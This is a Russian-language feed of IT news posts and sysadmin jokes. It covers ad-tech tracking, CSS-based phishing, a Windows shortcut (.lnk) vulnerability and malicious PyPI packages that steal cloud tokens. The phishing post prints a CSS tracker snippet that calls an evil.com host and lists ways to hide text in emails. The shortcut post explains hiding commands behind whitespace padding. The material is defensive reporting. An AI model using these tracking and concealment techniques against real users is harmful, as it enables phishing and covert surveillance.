😐 «Мы знаем всё о вас»: рекламная корпорация похвасталась тотальной слежкой за пользователями

Французская Publicis Groupe выпустила видео, которое заставило экспертов по кибербезопасности схватиться за голову. Алгоритм CoreAI анализирует поведение 91% взрослых интернет-пользователей, предсказывая их действия и влияя на выбор.

❓ Как это работает?

— В видео Publicis представила модельного пользователя Лолу, которая олицетворяет среднестатистического потребителя.

— Компания знает о ней буквально все: что она читает, смотрит, где живет, с кем общается, что и где покупает, а главное — почему она это делает 🛍

— CoreAI анализирует даже такие детали, как инфляция и изменения цен на товары, предсказывая, что Лола, например, переключится на более дешевый бренд сока для своих детей.

— Как только алгоритм делает такой вывод, Publicis тут же начинает показывать ей рекламу именно этих более дешевых товаров.

❗️ Эксперты обеспокоены: индустрия брокеров данных остается нерегулируемой, непрозрачной и опасной. Компании вроде Publicis собирают огромные массивы информации о пользователях, продают их третьим лицам, а конечная судьба этих данных остается неизвестной.

😱 — Это уже перебор!
😴 — Пусть смотрят, мне скрывать нечего.
😁 — Реклама дешёвого сока? Да это же гениально!

🥸 godnoTECH - Новости IT

Неправильно.
Это кнопка № 0

Типичный 🎹 Сисадмин

#предложка
Мы как-то iRu взяли. Я первые несколько секунд был озадачен.

Типичный 🤔 Сисадмин

Новый фишинг: Использование CSS для обхода спам-фильтров и слежки за пользователями.

Специалисты Cisco Talos опубликовали данные о новой технике, которую хакеры применяют для доставки фишинговых писем и слежки за жертвами. В отличие от традиционных методов с использованием JavaScript, здесь задействуется CSS, что усложняет обнаружение современными почтовыми фильтрами.

Как это работает, в двух словах:

Злоумышленники встраивают в HTML-письмо хитрый CSS-код, который:

🟢Прячет фишинговый контент: Используют CSS-свойства вроде text-indent: -9999px, opacity: 0 и другие, чтобы скрыть вредоносные элементы от глаз пользователей и простых спам-фильтров, которые смотрят на видимый текст.
🟢Организует слежку: Через @media-запросы (например, @media (max-width: 600px)) отслеживают взаимодействие с письмом – изменение размера окна, клики и т.п. – и отправляют данные на сервер злоумышленников.
🟢Обходит детекцию: Без JavaScript письмо выглядит менее подозрительно для систем, которые заточены на ловлю скриптов или вредных вложений.

Вот пример кода для наглядности:

<style>
  .tracker { display: none; }
  @media (max-width: 600px) {
    .tracker { display: block; background: url('http://evil.com/track?user=1'); }
  }
</style>
<div class="tracker"></div>

Принцип работы трекера:

Изменение размера окна просмотра письма (например, открытие на телефоне) может активировать скрытые элементы CSS. Эти элементы, в свою очередь, инициируют запросы к внешним ресурсам, расположенным на сервере злоумышленников, тем самым отслеживая активность пользователя.

Технические нюансы:

🟢JavaScript free: Вся схема работает только на HTML и CSS, что делает ее устойчивой к блокировщикам скриптов.
🟢Слабое место фильтров: Большинство спам-фильтров пока не умеют глубоко анализировать CSS на предмет таких штук, а сигнатуры еще не обновились.
🟢Вариативность сокрытия: Кроме text-indent и opacity, могут использовать position: absolute с отрицательными координатами или font-size: 0 для маскировки текста. Главное – скрыть видимое, но сохранить работоспособность трекера при рендеринге.

Что делать сисадминам, чтобы не пропустить новый фишинг:

🟢Прокачать фильтры: Настроить почтовые шлюзы на более глубокий анализ CSS в HTML-письмах. Для SpamAssassin, например, можно добавить правила для отлова подозрительных @media-запросов.
🟢Мониторить исходящий трафик: Следить за запросами к подозрительным доменам из почтовых клиентов, особенно если видите запросы на загрузку фоновых изображений (background: url()).
🟢Просвещать пользователей.

Пока это не массовая история, но метод реально обходит стандартные защиты и может стать трендом. Возможен рост таких атак, особенно в корпоративной среде.

Пора пересесть на lynx и читать почту в терминале 😬

Типичный 🥸 Сисадмин

🔧 Обновление BIOS длилось более 100 часов: уникальный случай с платой Biostar

• Пользователь Reddit с ником GoatWithAGun решил обновить BIOS своей системной платы BioStar A320MH — процесс начался, сразу пошёл странно, но при этом не прекращался.

• Обновление не завершалось: сначала час, потом сутки, а в итоге — более 100 часов.

• В итоге процесс завершился сбоем, и система перестала работать.

Интересно, спустя первый час его ничего не смутило? 😂

Типичный 🥸 Сисадмин

#предложка
Очень страшно начинать 😶

🥸: Еще больше масла в огонь подливает тот факт, что на стуле следы от обуви... Какова вероятность, что предыдущий админ выпилился?

Типичный 😬 Сисадмин

👾 На российском процессоре Эльбрус-8СВ запустили Minecraft

YouTube-канал Elbrus PC Play для запуска взял «старенькую» версию Minecraft 1.12.2; а в «роли Java» использовал OpenJDK 8.

• Нагрузка на видеокарту обычно была на уровне 5-15%
• На процессор — 10-20%, иногда поднималась до 30%.

🥸 godnoTECH - Новости IT

#предложка
Ничего необычно, на старой работе системник видеонаблюдения и тяжеленный ибп стояли прям на этом армстронге. Б-безопастность 👨‍🦳

Типичный 🌚 Сисадмин

Microsoft игнорирует 8-летнюю уязвимость в ярлыках, которую используют для шпионажа.

Trend Micro ZDI бьет тревогу: обнаружена масштабнейшая кампания APT-атак, эксплуатирующая уязвимость ZDI-CAN-25373 в файлах-ярлыках Windows (.lnk). Эта брешь позволяет злоумышленникам скрытно выполнять вредоносные команды на машинах жертв, маскируя их в безобидных на вид ярлыках.

Microsoft получила подробный эксплойт (proof-of-concept) от Trend Micro, но реакция "корпорации добра" поражает своей невозмутимостью. Уязвимость классифицирована как... "низкоприоритетная", ведь это всего лишь "проблема отображения в интерфейсе", а не какая-то там security дыра 🏥

Суть уязвимости:

Эксплуатация ZDI-CAN-25373 основана на хитром манипулировании отображением содержимого .lnk файлов. Атакующие создают файлы-ярлыки, в которых поле COMMAND_LINE_ARGUMENTS (куда прописываются аргументы запуска целевого файла) заполняется огромным количеством невидимых символов-разделителей (whitespace characters):

\x20 - Пробел
\x09 - Горизонтальная табуляция
\x0A - Перенос строки
\x0B - Вертикальная табуляция
\x0C - Прогон страницы
\x0D - Возврат каретки

В результате такого замусоривания стандартный интерфейс Windows попросту не может отобразить всю командную строку в поле "Объект". В итоге, вредоносные команды, которые реально будут выполнены при клике на ярлык, остаются скрыты от глаз пользователя.

Из-за этого избыточного "мусора" Windows UI оказывается не в состоянии корректно отобразить все содержимое поля "Объект" (Target) в свойствах ярлыка. Фактические вредоносные команды, которые будут выполнены при запуске ярлыка, оказываются скрытыми от глаз пользователя за пределами видимой области.

Как это работает на практике:

🟢Злоумышленник создает зловредный .lnk файл.
🟢В COMMAND_LINE_ARGUMENTS добавляется "тонна" пробелов/табуляций, за которыми прячется вредоносная команда (например, скачивание и запуск PowerShell-скрипта).
🟢При просмотре свойств ярлыка жертва видит лишь путь к безобидному файлу и длинную полосу пустых символов.
🟢Скрытая магия в конце командной строки остается незамеченной.
🟢При запуске ярлыка Windows честно выполняет всю командную строку, включая скрытый зловредный код.

Интересные технические детали от Trend Micro:

Некоторые особо креативные северокорейские APT-группы (Earth Manticore, Earth Imp) догадались раздувать размер .lnk файлов до 70 МБ!, нашпиговывая их избыточным whitespace и прочим "балластом" для лучшей маскировки 🍔

А использование комбинаций \x0A и \x0D в некоторых случаях приводило к тому, что в свойствах ярлыка в поле "Объект" отображался всего один выделяемый символ, скрывая всю остальную вредоносную начинку.

З.Ы. Теперь при подозрительном ярлыке первым делом выделяйте всю его командную строку – вдруг там прячется "километр" пробелов с сюрпризом.

Будьте бдительны и берегите свои сети💚

Типичный 🥸 Сисадмин

⌨️ Хакеры знают почти половину паролей, введённых в интернете

Анализ Cloudflare показал, что 41% успешных входов на сайты (с защитными механизмами Cloudflare) выполнены с украденными паролями.

Что обнаружил анализ?
• С сентября по ноябрь 2024 года 76% попыток входа с утекшими паролями на сайтах WordPress были успешными.
• Почти половина таких входов осуществлена ботами.

В чем опасность:
• Боты активно используют утёкшие данные из баз вроде Have I Been Pwned для атак credential stuffing.
• 95% попыток входа с утекшими паролями осуществляются ботами.
• CMS-системы, такие как WordPress, Joomla и Drupal, особенно уязвимы из-за стандартных механизмов аутентификации.

А какой у вас самый сложный пароль? 🌚

Типичный 🥸 Сисадмин

Списали. АдминЪ ⚰️

Типичный 🫡 Сисадмин

#предложка
Еще немного списания

Типичный 🫡 Сисадмин

Легенда гласит, что однажды у удаленного работника из-за сильного ветра вылетел ноут прямо из окна 🤔

Пользователь выбежал искать ноут на земле, а увидел следующее, сделав фото висящего ноута.

К счастью, боец выжил и вернулся в строй, отделавшись легким испугом.

Типичный 💨 Сисадмин

В PyPI обнаружены вредоносные пакеты, похищающие облачные токены.

Исследователи ReversingLabs обнаружили вредоносную кампанию в репозитории Python Package Index (PyPI). Злоумышленники загрузили 20 фиктивных библиотек, маскирующихся под утилиты, связанные со временем, но содержащих скрытый функционал для кражи чувствительных данных, включая токены доступа к облачным сервисам.

⚠️ Зараженные пакеты (суммарно более 14 100 загрузок до удаления):

snapshot-photo (2,448)
time-check-server (316)
time-check-server-get (178)
time-server-analysis (144)
time-server-analyzer (74)
time-server-test (155)
time-service-checker (151)
aclient-sdk (120)
acloud-client (5,496)
acloud-clients (198)
acloud-client-uses (294)
alicloud-client (622)
alicloud-client-sdk (206)
amzclients-sdk (100)
awscloud-clients-core (206)
credential-python-sdk (1,155)
enumer-iam (1,254)
tclients-sdk (173)
tcloud-python-sdks (98)
tcloud-python-test (793)

Часть пакетов использовалась для отправки данных на инфраструктуру злоумышленников. Другая группа имитировала облачные клиенты для Alibaba Cloud, Amazon Web Services и Tencent Cloud, но при этом тайно собирала и отправляла облачные секреты.

Любопытный факт: Три пакета (acloud-client, enumer-iam и tcloud-python-test) были указаны как зависимости в относительно популярном GitHub-проекте accesskey_tools (42 форка, 519 звезд), что способствовало их распространению.

Типичный 🎹 Сисадмин